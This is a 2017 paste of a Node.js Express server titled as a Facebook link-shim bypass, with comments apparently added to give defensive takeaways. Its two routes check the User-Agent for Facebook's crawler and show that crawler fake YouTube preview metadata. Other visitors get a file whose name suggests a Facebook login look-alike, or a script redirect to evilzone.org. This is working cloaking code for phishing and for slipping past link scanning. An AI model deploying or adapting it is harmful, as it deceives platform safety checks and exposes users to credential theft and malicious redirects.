
Facebook linkshim bypass + faking URLs

a guest
Oct 30th, 2017
  // Minimal Express app. The two GET routes registered on it below choose their
  // response from the request's User-Agent header.
  1. const express = require('express')
  2. const app = express()
  3.  
  // GET /test — User-Agent cloaking: the body returned depends on who asks, so a
  // link scanner that announces itself in its User-Agent never receives the page
  // that ordinary browsers get.
  // Defensive takeaway: request a suspicious URL with both a crawler-style and a
  // browser-style User-Agent and compare the bodies. Differing responses, or an
  // og:url naming a different host than the one serving the page, indicate cloaking.
  4. app.get('/test', function (req, res) {
  // Every request's User-Agent is written to the server log.
  5. console.log(req.headers['user-agent']);
  // Case-sensitive substring match on the raw header value.
  // NOTE(review): presumably aimed at Facebook's link-preview crawler — confirm
  // against the User-Agent strings actually seen in logs.
  6. if (req.headers['user-agent'].includes('facebook')) {
  7. console.log('Facebook bot detected, returning fake HTML without malicious code');
  // Crawler branch: static HTML whose image_src link and Open Graph tags (og:url,
  // og:title, og:description, og:image) all describe a YouTube video, not this host.
  8. res.send(`<html><head>
  9. <link href='https://i.ytimg.com/vi/CTFtOOh47oo/maxresdefault.jpg' rel='image_src'/>
  10. <meta content='https://www.youtube.com/watch?v=CTFtOOh47oo' property='og:url'/>
  11. <meta content='French Montana - Unforgettable ft. Swae Lee' property='og:title'/>
  12. <meta content='\"Unforgettable\" ft. Swae Lee Available at iTunes: http://smarturl.it/Unforgettable_fiTunes ...' property='og:description'/>
  13. <meta content='https://i.ytimg.com/vi/CTFtOOh47oo/maxresdefault.jpg' property='og:image'/>
  14. </head>
  15. <br>Hello world</html>`)
  16. }
  17. else {
  // Every other client is sent a local file. Its contents are not shown on this
  // page; the file name suggests a Facebook login look-alike (unconfirmed).
  18. res.sendFile('/root/barak/node/fblogin.htm')
  19. }
  20. })
  21.  
  // GET /fb — same User-Agent check as /test, but clients that do not match are
  // redirected instead of being served a file.
  // Defensive takeaway: the redirect is done by an inline script, not an HTTP 3xx
  // status, so URL analysis has to parse or render the body, using a browser-style
  // User-Agent, to learn where visitors end up.
  22. app.get('/fb', function (req, res) {
  // Every request's User-Agent is written to the server log.
  23. console.log(req.headers['user-agent']);
  // Case-sensitive substring match on the raw header value.
  24. if (req.headers['user-agent'].includes('facebook')) {
  25. console.log('facebook found');
  // Matching clients get static HTML whose image_src link and Open Graph tags
  // describe a YouTube video, not this host.
  26. res.send(`<html><head>
  27. <link href='https://i.ytimg.com/vi/CTFtOOh47oo/maxresdefault.jpg' rel='image_src'/>
  28. <meta content='https://www.youtube.com/watch?v=CTFtOOh47oo' property='og:url'/>
  29. <meta content='French Montana - Unforgettable ft. Swae Lee' property='og:title'/>
  30. <meta content='\"Unforgettable\" ft. Swae Lee Available at iTunes: http://smarturl.it/Unforgettable_fiTunes ...' property='og:description'/>
  31. <meta content='https://i.ytimg.com/vi/CTFtOOh47oo/maxresdefault.jpg' property='og:image'/>
  32. </head>
  33. <br>Hello world</html>`)
  34. }
  35. else {
  // All other clients receive a one-line script that sets document.location,
  // sending the browser to a different site than the preview metadata names.
  36. res.send('<script>document.location="http://evilzone.org/"</script>')
  37. }
  38. })
  39.  
  // Starts the listener on port 80 and logs a message once it is accepting connections.
  40. app.listen(80, function () {
  41. console.log('listening on port 80!')
  42. })